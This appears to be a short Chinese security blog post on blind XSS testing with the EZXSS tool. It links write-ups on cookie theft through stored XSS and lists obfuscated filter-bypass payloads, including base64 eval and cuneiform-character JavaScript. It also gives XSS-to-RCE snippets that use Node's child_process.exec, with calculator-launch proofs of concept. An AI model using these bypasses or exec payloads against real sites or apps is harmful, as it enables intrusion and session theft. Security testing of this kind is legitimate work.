EZXSS 一款XSS盲打漏洞测试工具
一些漏洞点及骚思路
- 新用户注册存储型XSS盲打获取Cookie
https://baijiahao.baidu.com/s?id=1700829679816535168&wfr=spider&for=pc
- 文件上传存储型XSS盲打获取Cookie
https://cloud.tencent.com/developer/article/1856838
- 投诉处XSS盲打
https://www.secpulse.com/archives/147537.html?ivk_sa=1024320u
- 日志xss打内网,nginx&apache结合的bug
https://www.csdn.net/tags/NtjaMg4sNzQyOTgtYmxvZwO0O0OO0O0O.html
xss-代码角度理解与绕过filter
https://www.cnblogs.com/Dark1nt/p/14852560.html
Some Payload
https://github.com/TyrantSec/Fuzzing/blob/master/XSS-Polyglots/99-XSS-Polyglots.txt
<style onload=eval(atob("YWxlcnQoMSkK"));></style>
<script>top[`al`+`ert`](1)</script>
<img src="x" onerror="top['al'+'ert'](1)">
<svg onload='top["al"+"ert"](1)'>
<script>𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()</script>
XSS→RCE
https://mp.weixin.qq.com/s/fh0JCWsv95NwBlmKN6rCNQ
<audio src=http://a onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>https://mp.weixin.qq.com/s/ZjYtFS8v4l6inEXnLoWTuw
https://mp.weixin.qq.com/s/wiT_Jh311FMdzqNb9AozWw
<script>
require('child_process').exec('calc');
// 或者
top.require('child_process').exec('open /System/Applications/Calculator.app');
</script>
Comments | NOTHING